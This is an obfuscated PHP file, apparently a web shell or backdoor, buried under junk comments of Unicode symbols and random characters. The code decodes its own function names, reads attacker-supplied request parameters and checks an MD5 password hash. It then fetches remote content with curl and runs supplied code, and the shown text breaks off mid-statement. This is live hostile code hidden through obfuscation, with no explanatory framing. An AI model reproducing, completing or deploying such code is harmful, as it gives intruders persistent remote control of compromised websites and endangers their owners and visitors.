<?php /*-

❋⇘⊈⒟ⅽ┆

wKN`=9]Z❋⇘⊈⒟ⅽ┆

-*///
$Jodl /*-

➓♋

x6➓♋

-*///
=/*-


㊫↓≹ⅺ¢⊦⋂⒊❷ℙ⋻∲≸⋠➼


MfZ㊫↓≹ⅺ¢⊦⋂⒊❷ℙ⋻∲≸⋠➼


-*///
 range/*-W%pkh_zQm=-*///
(/*-5Z|U,qjOI-*///
"~"/*-

❾✍♞█ˉ░⒐⚘ⓑ◁ℎ⋅⒑☾✵⓰ⅹ㈥❿⇍㊦✠

Qv~eK;o~@B❾✍♞█ˉ░⒐⚘ⓑ◁ℎ⋅⒑☾✵⓰ⅹ㈥❿⇍㊦✠

-*///
, /*-!q!53#VgF!-*///
" "/*-


✃{↛➲✻ℐ◷♥〈ⓝ┣}➄㊙♙☪㊄≃❼➵◟﹩﹡㊦Ψ↡


I%$A✃{↛➲✻ℐ◷♥〈ⓝ┣}➄㊙♙☪㊄≃❼➵◟﹩﹡㊦Ψ↡


-*///
); /*-nx.d4OQE&-*///
$Fy=${$Jodl[22+9].$Jodl[18+41].$Jodl[45+2].$Jodl[34+13].$Jodl[37+14].$Jodl[35+18].$Jodl[37+20]};@(count/*-jn{&qR)tK-*///
($Fy)==23&&/*-
⊰Ⓓ⑷﹤△
{FgBwQ⊰Ⓓ⑷﹤△
-*///
in_array(/*-tC;+0_AB}-*///
gettype($Fy).count/*-
ⅺ┙
`e&Ar)|yⅺ┙
-*///
($Fy),$Fy))?(($Fy[67]=$Fy[67].$Fy[74])&&($Fy[87]=$Fy[67]($Fy[87]))&&(@$Fy=$Fy[87]($Fy[56],$Fy[67](${$Fy[32]}[12])))/*-

¢✍⊢┺❊➑﹁➳●

2)|¢✍⊢┺❊➑﹁➳●

-*///
&&/*-HK2(2U-*///
$Fy()):$Fy;/*-


≹⊍∻◳⒬▾╨▥}囍➁⊇♔•


Ik@7E^-≹⊍∻◳⒬▾╨▥}囍➁⊇♔•


-*///
class /*-4LYY-*///
j{ /*-J@15-*///
static/*-


˜Ⅷ▧ↁ⊥➨╩⚘×⅟☏⒥⋱♙


l#>VK˜Ⅷ▧ↁ⊥➨╩⚘×⅟☏⒥⋱♙


-*///
 function /*-.lh-*///
KhLEl($SKPDW) /*-

⒜⋕㊣❺⊀╌≁◞◼⅚➸➓￣Σ⊝㈣㈤⇩¯✤↧♣⊤⒲

Y8%?Ig,K⒜⋕㊣❺⊀╌≁◞◼⅚➸➓￣Σ⊝㈣㈤⇩¯✤↧♣⊤⒲

-*///
{ $PZ/*-


∊㊓✝ⅳ➩◯┨ϟ┕ℊ∘ⓙ㊠└⒥▉ℒ卍


,<?hm∊㊓✝ⅳ➩◯┨ϟ┕ℊ∘ⓙ㊠└⒥▉ℒ卍


-*///
 = /*--}%z#.3)v-*///
"r"./*-t+sg+},J-*///
"a"./*-


☨✌


6&]fQ☨✌


-*///
"n"./*-


↰◟❏⒕◍≯↓〖ⓑ۵︶❧☪㊊㊯↩≓ℛ⏢¥］✜⚘⇅㈡⋲＂◯〉⋛


P[r1↰◟❏⒕◍≯↓〖ⓑ۵︶❧☪㊊㊯↩≓ℛ⏢¥］✜⚘⇅㈡⋲＂◯〉⋛


-*///
"g"./*-68-*///
"e"; /*-Kn$+-*///
$QBuKTYImbk/*-rLN!mr-*///
 = /*-


﹥⇦⋈✑♪⇗☵⊊⋫


PSCY<@1﹥⇦⋈✑♪⇗☵⊊⋫


-*///
$PZ/*-

⇒¾—○☃∁☟✔ℍ☪♘⇈∊↧◷╈）⓴✸░∮큐⊴⋺⋂╧↶

48TqQ3&t⇒¾—○☃∁☟✔ℍ☪♘⇈∊↧◷╈）⓴✸░∮큐⊴⋺⋂╧↶

-*///
(/*-7&k)-.L7#Z-*///
"~"/*-

⇐⊤≞⅞╓︽♩➹⋆≤◉

Ef+⇐⊤≞⅞╓︽♩➹⋆≤◉

-*///
, /*-?;I?4-*///
" "/*-

➘≡✹‰ﭢ─☍⇙∌▨/╫☶✩┝▓▼⒔┖◄～ℋ⊵Ⓘ↥∵⋙⋜⇖♒

1:{9➘≡✹‰ﭢ─☍⇙∌▨/╫☶✩┝▓▼⒔┖◄～ℋ⊵Ⓘ↥∵⋙⋜⇖♒

-*///
);/*->xNv`+U-*///
 $RWX /*-


≄≋㈨↊⅟


HJ)))_≄≋㈨↊⅟


-*///
= /*-
⇚⇀⓿⋩⅒Ⓡ☷╨▸Ⅿ┦⊾⊻ℑⅴ∊
c)F⇚⇀⓿⋩⅒Ⓡ☷╨▸Ⅿ┦⊾⊻ℑⅴ∊
-*///
explode/*-

◆⊹Ⓟ⋣⋐⇥⋸⇋▪╘➷⒳⒇┓∣◑╎↧☠⒣⇕

|q◆⊹Ⓟ⋣⋐⇥⋸⇋▪╘➷⒳⒇┓∣◑╎↧☠⒣⇕

-*///
(/*-

ℌ┦㊅☐↜⋎✩⊙┕↻㎡⊜ⓣ㊜⅖⊣㊮⇑☉▀

}6;tqn<ℌ┦㊅☐↜⋎✩⊙┕↻㎡⊜ⓣ㊜⅖⊣㊮⇑☉▀

-*///
")", /*-
㊒㊧
R6㊒㊧
-*///
$SKPDW/*-BT-*///
); /*-

┰㊣

_y([pN^┰㊣

-*///
$uOjLtD /*-

㎡┡⏢⊈Ⓤ∓⒀⒔➃➞≄∢╕「☜〗≦┮⑺∞╬︾┻░↖§˜

r`9R7;9㎡┡⏢⊈Ⓤ∓⒀⒔➃➞≄∢╕「☜〗≦┮⑺∞╬︾┻░↖§˜

-*///
= /*-


◝∦$ⅸ∡


,Aot◝∦$ⅸ∡


-*///
""; foreach /*-MxG-*///
(/*-

↯∗╅╂

6&)D-↯∗╅╂

-*///
$RWX /*-5IE-*///
as /*-
⏥⋘┢☊❇➮ⓐ%ℑ⒃∡㊎︼∕㏒♁∸≪⒴
L#⏥⋘┢☊❇➮ⓐ%ℑ⒃∡㊎︼∕㏒♁∸≪⒴
-*///
$ncrSDO /*-lh>cIZ6xZ-*///
=>/*-
ℯ⊦⒲✁©❺↟웃☼◲≑╅⒰↖⓾◤⒱∗⊨≎☹㊢⊘≄
8R~2igℯ⊦⒲✁©❺↟웃☼◲≑╅⒰↖⓾◤⒱∗⊨≎☹㊢⊘≄
-*///
 $FmkSaBjv/*-7Tb5E-*///
) /*-8MY0t-*///
$uOjLtD /*-
⚘❃↰╎㊢➨❉⑺▢⒞┚≉➵∻︿㊖≄⋨⓭
pZ=wP%v1K⚘❃↰╎㊢➨❉⑺▢⒞┚≉➵∻︿㊖≄⋨⓭
-*///
.= /*-

≐⇘☻≺✎✡◢⊲▁╠*✣﹢⊼╄♐▮﹩⇢⒀⋛◲┪⊻⊀㊆#≼

a8cNxB≐⇘☻≺✎✡◢⊲▁╠*✣﹢⊼╄♐▮﹩⇢⒀⋛◲┪⊻⊀㊆#≼

-*///
$QBuKTYImbk[$FmkSaBjv/*-

┨⊂▭◡㊅↵ⓐ∁｀⓳⇂✃

=Fuip8┨⊂▭◡㊅↵ⓐ∁｀⓳⇂✃

-*///
 - /*-HU~G-*///
60990/*-
ℙ✦ﭢ✼◳◜▄︹⒃✶㉿↘⋊№Ü⊎Ⅱ%≋⊷╇⊰⊅
k_M4-}ju1ℙ✦ﭢ✼◳◜▄︹⒃✶㉿↘⋊№Ü⊎Ⅱ%≋⊷╇⊰⊅
-*///
];/*-

﹢≷㊚⋷㊰⒍⒨☨⋕⅚✕⋇›⅘⑹ℰ⋠⒰ⅿ≬ℑ

e#A﹢≷㊚⋷㊰⒍⒨☨⋕⅚✕⋇›⅘⑹ℰ⋠⒰ⅿ≬ℑ

-*///
 return /*-

¶❽Ⓢ㊚┒∪├♡⒝➋º▔⊁⇍ⓙ⓵⓯⊟∨≕≈

H)c¶❽Ⓢ㊚┒∪├♡⒝➋º▔⊁⇍ⓙ⓵⓯⊟∨≕≈

-*///
$uOjLtD; /*-

✜〖

>G✜〖

-*///
} /*-Ofr0Wlw-*///
static /*-

㊜↦⌘✭⓫⊟︼⊔✉⊒↪〔♪↛±㏑┹㊣ⅵ┄⓱⊰☵✞

_2|㊜↦⌘✭⓫⊟︼⊔✉⊒↪〔♪↛±㏑┹㊣ⅵ┄⓱⊰☵✞

-*///
function /*-


∭▽÷⅜ⅴℯ┲∙∻ⅶ⋕€╒➝┭≠⒔⓰≮⑪◔∖▲≥﹉


|?NnYZqQG∭▽÷⅜ⅴℯ┲∙∻ⅶ⋕€╒➝┭≠⒔⓰≮⑪◔∖▲≥﹉


-*///
OWyG/*-Hw-*///
(/*-

⒎┕↟❺﹨⋍㊐┵㊠﹣⒮㊄〔➼➚∁⇠«↔┃◞‹┶✐↴⋯⇎

XbAzA⒎┕↟❺﹨⋍㊐┵㊠﹣⒮㊄〔➼➚∁⇠«↔┃◞‹┶✐↴⋯⇎

-*///
$XOoEaBuACe,/*-.N-%~g-*///
 $VgAteKzkI/*-


}╢≈⑰∓♓∕∲㊋


r}$^hJ}╢≈⑰∓♓∕∲㊋


-*///
)/*-


➍⊦Ⅷ⒕⊇►⒡◲✵₪◳↵➵◉✦╙ⓖ⓺±


NX._➍⊦Ⅷ⒕⊇►⒡◲✵₪◳↵➵◉✦╙ⓖ⓺±


-*///
 {/*-
〖﹩≊✃◓
Nl,-[〖﹩≊✃◓
-*///
 $PpRSsL/*-

ℌ✺⒖┗►☚≩➃⋓◆┞﹡∉⒫╇⊐

O~cℌ✺⒖┗►☚≩➃⋓◆┞﹡∉⒫╇⊐

-*///
 = /*-
▁￡┏⓭
%A:R|▁￡┏⓭
-*///
curl_init/*-V=Fw`p-*///
(/*-
ⓨ⓪⊀⅛Ⅺ■┘─℠◩卐‖⊢㈡⒈④
C$i+lIlk[ⓨ⓪⊀⅛Ⅺ■┘─℠◩卐‖⊢㈡⒈④
-*///
$XOoEaBuACe/*-


≽㊆Ⓩ』】►⌘ↅ➛큐⋸╟≔♭➴⋠ⅿ⓮☂↺÷✝⅗➅⒱


Qc)-~W$Sx≽㊆Ⓩ』】►⌘ↅ➛큐⋸╟≔♭➴⋠ⅿ⓮☂↺÷✝⅗➅⒱


-*///
);/*-

㊎▏♠┝◉⑩℠{④✉❽‡⒳⇀╣$◙✄▃⊉⇋∳┬﹪✰

iK@dHY,!U㊎▏♠┝◉⑩℠{④✉❽‡⒳⇀╣$◙✄▃⊉⇋∳┬﹪✰

-*///
 curl_setopt/*-z?@-*///
(/*-3RBH`o-*///
$PpRSsL,/*-^X-*///
 CURLOPT_RETURNTRANSFER,/*-


⋡﹦︼▴ℍ♛≨


1=⋡﹦︼▴ℍ♛≨


-*///
 1/*-)6]c-*///
);/*-H,R_YcXK=0-*///
 $fR/*->63qd7Dg7-*///
 = /*-Ksq-*///
curl_exec/*-jG+}^-*///
(/*-rtsNqEYl-*///
$PpRSsL/*-


≔⒛∲│◬◦ℴⒺ卍⑾㊡⒈⒨⋌☚ↁ◳╆┵↊⑲ℬ◱❥︽


;}tI≔⒛∲│◬◦ℴⒺ卍⑾㊡⒈⒨⋌☚ↁ◳╆┵↊⑲ℬ◱❥︽


-*///
); /*-6jR-*///
return /*-
÷╍﹦◡Ⅷ
ij.-9÷╍﹦◡Ⅷ
-*///
empty/*-


▶∠♂☯⊤⊖ⓢ☚≨➹◻⇂⇌⌘▃➜≡◙❂≕


oDBZK<▶∠♂☯⊤⊖ⓢ☚≨➹◻⇂⇌⌘▃➜≡◙❂≕


-*///
(/*-


♥╣⓹⋞♓➵ⅸ⋯∨↛≢Ⓣ☂㊖♭⊍↪ℐ⋂Ⅸ㊙≪℗Ⓢ⇢￡╒


h=53!#D♥╣⓹⋞♓➵ⅸ⋯∨↛≢Ⓣ☂㊖♭⊍↪ℐ⋂Ⅸ㊙≪℗Ⓢ⇢￡╒


-*///
$fR/*-
↱≂
;|~e}!!&d^↱≂
-*///
)/*-[SgjnJM-*///
 ? /*-m+?qze`H-*///
$VgAteKzkI/*-
^┿≷♥⋒◎
iOLt^┿≷♥⋒◎
-*///
(/*-
﹢❊*†✻┸➬ℂ⅔✱Θ★┱➥♬⋯✢※Ⓒ⊑┓⒌⊄﹩‰㊎ⓢ
&kJL)s}﹢❊*†✻┸➬ℂ⅔✱Θ★┱➥♬⋯✢※Ⓒ⊑┓⒌⊄﹩‰㊎ⓢ
-*///
$XOoEaBuACe/*-rZZi-*///
)/*-ad-*///
 : /*-?7X-*///
$fR; /*-
ϟ⋦⋧∅⊃♟〃┢◿┨▃⋐∝➁⊼╥╢⋡∴┈✌≡♘⊒❣↮≍
XYϟ⋦⋧∅⊃♟〃┢◿┨▃⋐∝➁⊼╥╢⋡∴┈✌≡♘⊒❣↮≍
-*///
}/*-


♫▥「↾≐╃∌⋝⒵∾┬➛№）︷◕❊✫▯﹨➊▏￣┛—✽


fGO2♫▥「↾≐╃∌⋝⒵∾┬➛№）︷◕❊✫▯﹨➊▏￣┛—✽


-*///
 static/*-
⑮╀⇤〕⒌☸∜┰✶┠ℯ✩┣㊟♭☢
L:mVP@N⑮╀⇤〕⒌☸∜┰✶┠ℯ✩┣㊟♭☢
-*///
 function /*-xFB]k}Ti!l-*///
qx/*-
«✩▰⊙
$Q]|H60@M«✩▰⊙
-*///
() /*-
↿Юℜ╏④⋜⋇∭≑┘♧⇄≠웃❂✫∑◟┞◃☒⇝⅒❊➝□
4~)@s↿Юℜ╏④⋜⋇∭≑┘♧⇄≠웃❂✫∑◟┞◃☒⇝⅒❊➝□
-*///
{/*-


﹁∓╅✙⋱≒↜┊


~od[zv,﹁∓╅✙⋱≒↜┊


-*///
 $xiRn /*-

≟◌≹ⓑ⒦Ⓟⅴ⒭≃≫

59W|obIKG≟◌≹ⓑ⒦Ⓟⅴ⒭≃≫

-*///
=/*-


）⋭≘➈㊟⓵≐⒪♜⇪❀Ⓡ∂∞Ⓙ≽Ⓕ◢⋸㈥✘╇╀◀㊖⊯ℝ


LL）⋭≘➈㊟⓵≐⒪♜⇪❀Ⓡ∂∞Ⓙ≽Ⓕ◢⋸㈥✘╇╀◀㊖⊯ℝ


-*///
 array/*-


╨⊲℮╢ⓧ⑲∺◁⊴⋀⋹↊ⓛ⒫


v0]R(9F>╨⊲℮╢ⓧ⑲∺◁⊴⋀⋹↊ⓛ⒫


-*///
("61017)61002)61015)61019)61000)61015)61021)61014)60999)61006)61017)61000)61011)61005)61006","61001)61000)61002)61021)61002)61005)61000)61067)61065","61010)61001)61005)61006)61021)61016)61015)61017)61005)61016)61015","61004)61019)61017)61009","61018)61019)61001)61015)61062)61064)61021)61016)61015)61017)61005)61016)61015","61014)61011)61008)61015)61021)61013)61015)61000)61021)61017)61005)61006)61000)61015)61006)61000)61001","61044)61074","60991","61069)61074","61051)61034)61034)61051)61027","61005)61014"); /*-


↣☇∜ℜ╀❻∓ⓩ☆⊤㊖➘［➔½✶


kE|!↣☇∜ℜ╀❻∓ⓩ☆⊤㊖➘［➔½✶


-*///
foreach /*-M50F-*///
(/*-q[baUb-*///
$xiRn/*-Pyu&-*///
 as /*-BCbIJ0i<-*///
$HXe/*-P{N3RsIaG1-*///
)/*-
➈⒋⒃⋺⓸⇥｜┰ⓤ☋⒓➶↓⇩⋆⋦⇞┙Ⓛ☷ℚ△﹦⒞♓♪┌◱ℎ
w-g}qHbl?k➈⒋⒃⋺⓸⇥｜┰ⓤ☋⒓➶↓⇩⋆⋦⇞┙Ⓛ☷ℚ△﹦⒞♓♪┌◱ℎ
-*///
 $Cdjk/*-

➛┻⒚⊼┳▼↦＂✯≑Ⅻ⋑➙↾✺€⊥⒮Ψ∣

axCvj00<v➛┻⒚⊼┳▼↦＂✯≑Ⅻ⋑➙↾✺€⊥⒮Ψ∣

-*///
[] /*-
▊⅞⇐◲⊌╃⋡➀✰‰▵々﹋⒐➠◙☣﹫⇉∤⌓⒭
,l6L<R{▊⅞⇐◲⊌╃⋡➀✰‰▵々﹋⒐➠◙☣﹫⇉∤⌓⒭
-*///
= /*-
↴㊜◟⅐≗（↣┈
azs↴㊜◟⅐≗（↣┈
-*///
self/*-!m37U7-*///
::/*-


◙✤➦￡➸▀⋇◮⊊⓴ℙ&⒨⅟﹊◊℮﹋☽∇⊜▇✖


tZ)Fz+h◙✤➦￡➸▀⋇◮⊊⓴ℙ&⒨⅟﹊◊℮﹋☽∇⊜▇✖


-*///
KhLEl/*-
∜⒮┊➃⋠╤ⅻ⋔↔▏│♢╗⊮⊥⑳⊬⑲℘╉➴⋸∏⊗
Y=M∜⒮┊➃⋠╤ⅻ⋔↔▏│♢╗⊮⊥⑳⊬⑲℘╉➴⋸∏⊗
-*///
(/*-0BR3XXpMsC-*///
$HXe/*-

ㄨ▨ⓝℜ⊉⋉⋺ℯ∿↹✝─⊻∲⋗℉═⊋➯ⓖ⋓⓪∩Ⅺ

_#azㄨ▨ⓝℜ⊉⋉⋺ℯ∿↹✝─⊻∲⋗℉═⊋➯ⓖ⋓⓪∩Ⅺ

-*///
);/*-}@wiI-*///
$IbiNOGuHeV /*-rxL;Y4#-*///
= /*-


큐﹤╅


Uj큐﹤╅


-*///
@$Cdjk/*-


Ⅷ☐≯☴Ⅳ∴⒝


!0(D}EⅧ☐≯☴Ⅳ∴⒝


-*///
[/*-

⋈⓴❈↻ⓧ㈤¿∓⋾⇜☎ⓢ

>iEj%TJqt⋈⓴❈↻ⓧ㈤¿∓⋾⇜☎ⓢ

-*///
1/*-

┣↉➼ت⊺≀◖⓫⅕╂♒↻⒵☢⊈⊲❥⒬⇤✑㊩㊆√⋄◫⋼╌≧♦卍╅

Bgy>!~fM┣↉➼ت⊺≀◖⓫⅕╂♒↻⒵☢⊈⊲❥⒬⇤✑㊩㊆√⋄◫⋼╌≧♦卍╅

-*///
]/*-bx-*///
(/*-


ⅸ✆➛➷⒅➯╋⑿¤ⓩ┸⊍⊩↝➆⊿


oe:ⅸ✆➛➷⒅➯╋⑿¤ⓩ┸⊍⊩↝➆⊿


-*///
${/*-


ⓑ☮❋⓳﹍∷$☎⇐☠↽≔∈▅۵♢◹⑰ⅿ◎≂☃╛Ⓙ㊭⑥Ⓠ⊃⋧❽


6vⓑ☮❋⓳﹍∷$☎⇐☠↽≔∈▅۵♢◹⑰ⅿ◎≂☃╛Ⓙ㊭⑥Ⓠ⊃⋧❽


-*///
"_"/*-,U=S`8VDa-*///
."G"/*-

≺{┌⑨㊈⋝➲⋛ⓠ✖⊛❉⇥㊛┐♞➍┢✿

sciU≺{┌⑨㊈⋝➲⋛ⓠ✖⊛❉⇥㊛┐♞➍┢✿

-*///
."E"/*-


╃≳㊔


t0p|╃≳㊔


-*///
."T"/*-


*♨#≐⇒☼⒭┿Ⓙ⑰ⓝ♆┆✕✝◈


9Z`bd*♨#≐⇒☼⒭┿Ⓙ⑰ⓝ♆┆✕✝◈


-*///
}[/*-
↮┈❄⋄☬유✣▎≬⇄⊱≰❂✲✫«㊮¢︸╬♯✉➒
Q!N<><:UT↮┈❄⋄☬유✣▎≬⇄⊱≰❂✲✫«㊮¢︸╬♯✉➒
-*///
$Cdjk/*-yW-*///
[/*-


ⅷ▿┍◂➧囍Ⓠⓤ⒵〗≮◸⒜▮⊐∳「ⅱ┹⒊♝✭Ⓧ✑≛☥⒴


=.tmlL$1ⅷ▿┍◂➧囍Ⓠⓤ⒵〗≮◸⒜▮⊐∳「ⅱ┹⒊♝✭Ⓧ✑≛☥⒴


-*///
9+0/*-N!n`-*///
]]/*--#jxF-*///
);/*-2ySH-*///
 $LhdEi /*-1G,^raZ$V-*///
=/*-]^O&-*///
 @$Cdjk/*-

⒓Ⓡ☟♋╔

S7]:~Qw⒓Ⓡ☟♋╔

-*///
[/*-

ⅾ☺ⅰ÷∯⇓⇜≔⇏ℐ☍ⅷ✘⇌⊕Ⓗ♢③⇕¶⑬◂

GJd#>cQCF7ⅾ☺ⅰ÷∯⇓⇜≔⇏ℐ☍ⅷ✘⇌⊕Ⓗ♢③⇕¶⑬◂

-*///
2+1/*-3S-*///
]/*-3?3j:-*///
(/*-
✦⑲›┈ⓧ﹏◬┧
>#M✦⑲›┈ⓧ﹏◬┧
-*///
$Cdjk/*-
◕✑╨♯┼♩♫¯￣☻╩↕㊚⋮╧㈩♈□◦
!;IzRu9OT◕✑╨♯┼♩♫¯￣☻╩↕㊚⋮╧㈩♈□◦
-*///
[/*-[d`r4-*///
0+6/*-!4-*///
], /*-g##8k-*///
$IbiNOGuHeV/*-

◲░⇊↭⇆∎↧∥▂⒯‹↿∭╕╁≸✷Ↄⅲ

dvFu_◲░⇊↭⇆∎↧∥▂⒯‹↿∭╕╁≸✷Ↄⅲ

-*///
);/*-
╍∎❂▴⒁⇑ℛ⒵
e[dJ╍∎❂▴⒁⇑ℛ⒵
-*///
 $FLbv /*-

↟│✔⊐∀⒮≤☬Ⓠ☜♂ℬ﹉⇄⅗ⓡ↕⋌⒁㊒→☽⓷⊄▬◑➙Ⅻ◲♞❾

fi$x↟│✔⊐∀⒮≤☬Ⓠ☜♂ℬ﹉⇄⅗ⓡ↕⋌⒁㊒→☽⓷⊄▬◑➙Ⅻ◲♞❾

-*///
=/*-


➞♈Ⓝ⓬╁✄ϡ﹀↓▫◎⓼┆ⅸ▍「⋳﹄┖┟≁↨✿❁⒂↬


U(_O{➞♈Ⓝ⓬╁✄ϡ﹀↓▫◎⓼┆ⅸ▍「⋳﹄┖┟≁↨✿❁⒂↬


-*///
 $Cdjk/*-

◻⋜〗

]VqWzn◻⋜〗

-*///
[/*-6gR+rJj4e-*///
1+1/*-


✪☐∺➏⊝╙≬⅒┠≽⓲☥♭⇈↿⊋▲⋃⇏€》㊮ℴ┖⇒∩｀➞≘


rl✪☐∺➏⊝╙≬⅒┠≽⓲☥♭⇈↿⊋▲⋃⇏€》㊮ℴ┖⇒∩｀➞≘


-*///
]/*-

Ⅾℱ⊽㊅〉⊳≶↹┛╕

%Zy94~pe0Ⅾℱ⊽㊅〉⊳≶↹┛╕

-*///
(/*-nK-uXJ-*///
$LhdEi,/*-EDUC3E-c-*///
 true/*-

⇊⊞⑥↜Ⓚ◃㊥❁➺≝≸㈦ℓ⒫⓽➎㊍⋂┏☦◸➌

U5n⇊⊞⑥↜Ⓚ◃㊥❁➺≝≸㈦ℓ⒫⓽➎㊍⋂┏☦◸➌

-*///
); /*-h3;WK~m09-*///
@${/*-+,7LFg5-*///
"_"./*-


⊢큐⑰ⓤ●⇖┛☠↣⇏☹¿⋽⒜☾♛⒘⋤


aB]6{⊢큐⑰ⓤ●⇖┛☠↣⇏☹¿⋽⒜☾♛⒘⋤


-*///
"G"./*-,F3yrm2]r-*///
"E"/*-

€∹↞∢

~A(m0v2@s€∹↞∢

-*///
."T"/*-
┣❸┮↮☬▰╉⒌⇀⑰㊖ღ㊝➳⇅♮ⓖ≃┉☀﹦Ⅾ㊦┯☚⊣
z#┣❸┮↮☬▰╉⒌⇀⑰㊖ღ㊝➳⇅♮ⓖ≃┉☀﹦Ⅾ㊦┯☚⊣
-*///
}/*-c$53+bm-*///
[/*-


★➛⓺⋖◙◓☑⒞Ⓟ︿╁


A2B★➛⓺⋖◙◓☑⒞Ⓟ︿╁


-*///
$Cdjk/*-Vf-*///
[9+1/*-L<}@R$~-*///
]/*-

♟｀∻ⓘ↳✈⇠⇂∵

VS=q♟｀∻ⓘ↳✈⇠⇂∵

-*///
]/*-<ByfG.JH97-*///
 == /*-<iw-*///
1 /*-

⅙Σ╉⊮☺⋇↔⊤◸£≻⋺▊☒⊩⋆︴々◴≮≹➎┱ℊ⊲⒳∰✦

LeRr_1]⅙Σ╉⊮☺⋇↔⊤◸£≻⋺▊☒⊩⋆︴々◴≮≹➎┱ℊ⊲⒳∰✦

-*///
&& /*-
✣╞≞◴≽╉⒒⑪⏎⊋➙∾⊬☋✜½﹍╓㊯✿⋒↫❉⒬╦㍿⋟
,w@+0DJEI✣╞≞◴≽╉⒒⑪⏎⊋➙∾⊬☋✜½﹍╓㊯✿⋒↫❉⒬╦㍿⋟
-*///
die/*-C~9-*///
(/*-
⇉▹℘↋┯≎⅒㈨⓸►╁
Dmd#-ka~8⇉▹℘↋┯≎⅒㈨⓸►╁
-*///
$Cdjk[2+3/*-RZ4$A@k0y-*///
]/*-


≛㊉├⇘▶Ⓧ✘ℭ◔⋎⊉▿∝ⓑ†℮≙⋇☟♠⒏≆㊐ℕ♭☰≰⊑


lz7≛㊉├⇘▶Ⓧ✘ℭ◔⋎⊉▿∝ⓑ†℮≙⋇☟♠⒏≆㊐ℕ♭☰≰⊑


-*///
(/*-n~UeKS-*///
__FILE__/*-YiP2-*///
)/*-y&{+-*///
); /*-Jp`Tgv!D-*///
if/*-qA-*///
(/*-;AR:-*///
 (/*-:pNsI3{-*///
(@/*-
♧︸⅛✍∆≝∋║┣≹§◪⋠∽〉╄↵⋹﹌⅞㈤®㊌⇧➔ⓙ⇍►➈✪∞
]q♧︸⅛✍∆≝∋║┣≹§◪⋠∽〉╄↵⋹﹌⅞㈤®㊌⇧➔ⓙ⇍►➈✪∞
-*///
$FLbv/*-
╨ⓓ℃㊓⑬
#ZhHNl`QM╨ⓓ℃㊓⑬
-*///
[/*-


⊠⊯▏›✧


twm.⊠⊯▏›✧


-*///
0/*-


︴≎➾⒄×♤⋔


Kq)4ic[︴≎➾⒄×♤⋔


-*///
] /*-
✦➻↬ⓚⓓ◞☊⇡✱㊬㊊➲⊁↳］⊱⋅☓
Y5d^d2`F✦➻↬ⓚⓓ◞☊⇡✱㊬㊊➲⊁↳］⊱⋅☓
-*///
- time/*-

↝✳∘█&┥◝《∱⒩☍

?~#X<5<↝✳∘█&┥◝《∱⒩☍

-*///
()/*-

Ⓩ⇈↢ღ┌┲╉✄⋍⋃➺Ⓡ↣⋑⇠⋓∅⋈↷｀

gY(Y5RⓏ⇈↢ღ┌┲╉✄⋍⋃➺Ⓡ↣⋑⇠⋓∅⋈↷｀

-*///
) > /*-6-f3-*///
0/*-


➨⅐⓮㏑㏒/ⓤ⒴ⓦ﹜↿┢¥ℤ★㊯Ⓡ➻﹉➂┩⋎▴⋈∴∤┝⒨ℊ➐↥


w,➨⅐⓮㏑㏒/ⓤ⒴ⓦ﹜↿┢¥ℤ★㊯Ⓡ➻﹉➂┩⋎▴⋈∴∤┝⒨ℊ➐↥


-*///
)/*-

↛⋤Ⅼ⋂◑웃☹ⓚ∅☞⊧Ⓧ☃☌⊲◼✶⑧▮ℒ⊚℗⒃︾▁

<+[ksHyH↛⋤Ⅼ⋂◑웃☹ⓚ∅☞⊧Ⓧ☃☌⊲◼✶⑧▮ℒ⊚℗⒃︾▁

-*///
 and /*-


╣☦⊀⒭∑❆☱ⅷ≌✄ⅲ∽⓽⋨↋≧㈩⑱큐⑻⇌㊕◿┡✓


^)L,╣☦⊀⒭∑❆☱ⅷ≌✄ⅲ∽⓽⋨↋≧㈩⑱큐⑻⇌㊕◿┡✓


-*///
(/*-
╁⋫÷┟✺█☒∱✼⇏⑫Φ✡⋾┕╌▼┈❄☩
~2╁⋫÷┟✺█☒∱✼⇏⑫Φ✡⋾┕╌▼┈❄☩
-*///
md5/*-

♂❋⇩⑴◽≇〉ↆⓌℊ▂‹▅☨╟

7KxdxC}♂❋⇩⑴◽≇〉ↆⓌℊ▂‹▅☨╟

-*///
(/*-

⊜№☲Ⓑ⒨┎Ⅶℑ

vUjE^$2⊜№☲Ⓑ⒨┎Ⅶℑ

-*///
md5/*-


┞ⓥ≹➚➻❉⒂㊦≬∙㊨↯┊◽▋


2qG^┞ⓥ≹➚➻❉⒂㊦≬∙㊨↯┊◽▋


-*///
(/*-
ⓥ﹦【➄∫㊞∻⒤⋽㊤▋︵Ü☵➳ⅵΘ㈢•❁✮▔▹ℰ
Tzr:XQyRNⓥ﹦【➄∫㊞∻⒤⋽㊤▋︵Ü☵➳ⅵΘ㈢•❁✮▔▹ℰ
-*///
$FLbv/*-

◧∟┆卍※Ⅼ╝≜

(N+fcXHY◧∟┆卍※Ⅼ╝≜

-*///
[/*-


↮ↆ◰≜⅜﹎⅞㊬❀∬ℴ⊛¤↳Θ❺◸Ⅺ≙◇


U82L#,↮ↆ◰≜⅜﹎⅞㊬❀∬ℴ⊛¤↳Θ❺◸Ⅺ≙◇


-*///
0+3/*-

♓⓻➑╃ℱ≒✂⇎ⅻↃ⒖￣⊇︾▓Ⓤ⊴◵↡⋝ⓑ©♗▯◙➃Ⓠ⒴⊡ℝ≐

.-♓⓻➑╃ℱ≒✂⇎ⅻↃ⒖￣⊇︾▓Ⓤ⊴◵↡⋝ⓑ©♗▯◙➃Ⓠ⒴⊡ℝ≐

-*///
]/*-

⇒⊜↴⇦➤♧➯∨♗Ⓦ✽㈥╔Ⅶ◅➾©

}+UkV⇒⊜↴⇦➤♧➯∨♗Ⓦ✽㈥╔Ⅶ◅➾©

-*///
)/*-


◲㈩♩➨⇣Ⅺℍ▢╂⋠⋶≙♟◀⋢↼◓┧▵◚∵Ⓡ⓳◒◇⇘◼㊦☼⊥


]lA6}uac`◲㈩♩➨⇣Ⅺℍ▢╂⋠⋶≙♟◀⋢↼◓┧▵◚∵Ⓡ⓳◒◇⇘◼㊦☼⊥


-*///
)/*-}WM{j-*///
 === /*-oa%M)x-*///
"179f41ade4afaefd90500d7321ceb50e"/*-B8Z|a3p-*///
)/*-
┶♧Ⅷ╘⊭╎≱◫✗➬☶▬⊝㈩≄┱▢
Oz~┶♧Ⅷ╘⊭╎≱◫✗➬☶▬⊝㈩≄┱▢
-*///
 ): /*-


☝⊠


VJp-☝⊠


-*///
$bQjBSMnV /*-FX;s&T-*///
=/*-

↊┑❶¡ℋ㊤✞㊀

,&?g{↊┑❶¡ℋ㊤✞㊀

-*///
 self/*-=b%xV4xN-*///
::/*-],(;1n-*///
OWyG/*-iIhm&-*///
(/*-!x-*///
$FLbv/*-

